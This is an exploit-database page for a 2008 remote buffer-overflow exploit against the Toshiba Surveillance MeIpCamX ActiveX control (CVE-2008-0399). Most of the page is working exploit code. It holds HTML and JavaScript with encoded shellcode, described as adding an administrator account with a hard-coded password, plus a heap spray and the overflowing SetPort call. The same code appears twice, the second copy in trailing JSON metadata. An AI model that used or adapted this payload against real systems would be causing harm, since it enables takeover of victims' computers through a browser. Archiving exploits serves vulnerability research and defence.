Search...

Toshiba Surveillance MeIpCamX.DLL 1.0.0.4 Remote BoF Exploit

2008-01-20T00:00:00

ID EDB-ID:4946
Type exploitdb
Reporter rgod
Modified 2008-01-20T00:00:00

Description

Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform

                                        
                                            &lt;!--
Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote
buffer overflow exploit (IE7/xpsp2)

a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio
codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab

rgod-tsid-pa-he-ru-ka
-
stay tuned with us ...
http://retrogod.altervista.org/join.html
security feeds, radio streams, techno/drum & bass stations to come
--&gt;
&lt;html&gt;
&lt;object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' /&gt;
&lt;/object&gt;
&lt;script language="javascript"&gt;
///add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
                     "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
                     "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
                     "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
                     "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
                     "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
                     "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
                     "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
                     "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
                     "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
                     "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
                     "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
                     "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
                     "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
                     "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
                     "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
                     "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
                     "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
                     "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
                     "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
                     "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
                     "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
                     "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
                     "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
                     "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
                     "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
                     "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
                     "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
                     "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
                     "%u7734%u4734%u4570");
bigblock  = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length&lt;slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i&lt;444;i++){memory[i] = block+shellcode}

         //thx to Solar Designer and metasploit crew, is always intended

puf=""; for (i=0;i&lt;28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks
RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself
&lt;/script&gt;
&lt;/html&gt;

# milw0rm.com [2008-01-20]

JSON Vulners Source

Initial Source

{"hash": "27f60e74cc46e2fc04126514df0ef13b841eaf8f33a20fe7a612afb0e2ab1aef", "id": "EDB-ID:4946", "lastseen": "2016-01-31T21:09:55", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4946/", "description": "Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform", "title": "Toshiba Surveillance MeIpCamX.DLL 1.0.0.4 Remote BoF Exploit", "sourceData": "\n<html>\n<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />\n</object>\n<script language=\"javascript\">\n///add su one, user: sun pass: tzu\nshellcode = unescape(\"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949\" +\n \"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a\" +\n \"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241\" +\n \"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c\" +\n \"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c\" +\n \"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f\" +\n \"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b\" +\n \"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c\" +\n \"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871\" +\n \"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835\" +\n \"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b\" +\n \"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b\" +\n \"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34\" +\n \"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35\" +\n \"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550\" +\n \"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b\" +\n \"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c\" +\n \"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943\" +\n \"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370\" +\n \"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377\" +\n \"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630\" +\n \"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265\" +\n \"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330\" +\n \"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574\" +\n \"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030\" +\n \"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f\" +\n \"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e\" +\n \"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242\" +\n \"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741\" +\n \"%u7734%u4734%u4570\");\nbigblock = unescape(\"%u9090%u9090\");\nheadersize = 20;\nslackspace = headersize+shellcode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+shellcode}\n\n //thx to Solar Designer and metasploit crew, is always intended\n\npuf=\"\"; for (i=0;i<28;i++){puf = puf + unescape(\"%0e\")} //no more than 28, otherwise you fall in seh tricks\nRecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself\n</script>\n</html>\n\n# milw0rm.com [2008-01-20]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-0399"], "published": "2008-01-20T00:00:00", "osvdbidlist": ["40519"], "references": [], "reporter": "rgod", "modified": "2008-01-20T00:00:00", "href": "https://www.exploit-db.com/exploits/4946/"}